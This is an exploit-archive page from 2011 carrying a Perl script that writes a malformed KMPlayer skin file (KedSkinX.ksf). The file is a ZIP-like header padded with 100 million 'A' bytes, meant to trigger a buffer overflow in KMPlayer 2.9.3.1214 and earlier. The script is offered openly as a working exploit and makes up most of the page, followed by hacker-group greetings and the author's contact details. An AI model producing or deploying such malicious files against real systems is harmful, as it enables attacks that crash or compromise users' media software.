[D] KMPlayer 'Skins' V<=2.9.3.1 Buffer Overflow [Z]

2011-02-26 17:36:27
Inviato da: kedans

#!/usr/bin/perl

###
# Title : KMPlayer 'Skins' V&lt;=2.9.3.1 Buffer Overflow
# Author : KedAns-Dz
# E-mail : [email protected]
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# Tested on : windows XP SP3 Fran&ccedil;ais &amp; Arabic
# Target : KMPlayer Version &lt;= 2.9.3.1214
###

# Note : This Exploit BOF is Special Greets to Member ' Overfolw ' From sec4ever.com

#START SYSTEM /root@MSdos/ :
system(&quot;title KedAns-Dz&quot;);
system(&quot;color 1e&quot;);
system(&quot;cls&quot;);

print &quot;\n\n&quot;.
&quot; ||========================================||\n&quot;.
&quot; || ||\n&quot;.
&quot; || KMPlayer 'Skins' V&lt;=2.9.3.1214 ||\n&quot;.
&quot; || Exploit Buffer Overflow ||\n&quot;.
&quot; || Created BY KedAns-Dz ||\n&quot;.
&quot; || ked-h(at)hotmail(dot)com ||\n&quot;.
&quot; || ||\n&quot;.
&quot; ||========================================||\n\n\n&quot;;
sleep(2);
print &quot;\n&quot;;
print &quot; [!] Please Wait Till c0de Generate...\n&quot;;
my $ked = &quot;\x41&quot; x 100000000 ; # Integer Overflow
my $Buf =
&quot;\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00\x51\x6a\x95\x35\xaf\xa6&quot;. # Skin index
&quot;\xbd\x3f\x45\x08\x00\x00\x3f\x00\x00\x00&quot;.
&quot;$ked&quot;; # end Skin index
$file = &quot;KedSkinX.ksf&quot;; # Evil File ( KMP.Skin.file )
open (F ,&quot;&gt;$file&quot;);
print F $Buf;
sleep (2);
print &quot;\n [+] Creat File : $file , Succesfully ! \n&quot;;
close (F);

#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
# GreetZ to : Islampard * Dr.Ride * Zaki.Eng * BadR0 * NoRo FouinY * Red1One
# XoreR * Mr.Dak007 * Hani * TOnyXED * Fox-Dz * Massinhou-Dz ++ all my friends ;
# &gt; Algerians &lt; [D] HaCkerS-StreeT-Team [Z] &gt; Hackers &lt;
# My Friends on Facebook : Nayla Festa * Dz_GadlOl * MatmouR13 ...all Others
# 4nahdha.com : TitO (Dr.Ride) * MEN_dz * Mr.LAK (Administrator) * all members ...
# sec4ever.com members Dz : =&gt;&gt;
# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz ... all Others
# hotturks.org : TeX * KadaVra ... all Others
# Kelvin.Xgr ( kelvinx.net)
#===========================================================================

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.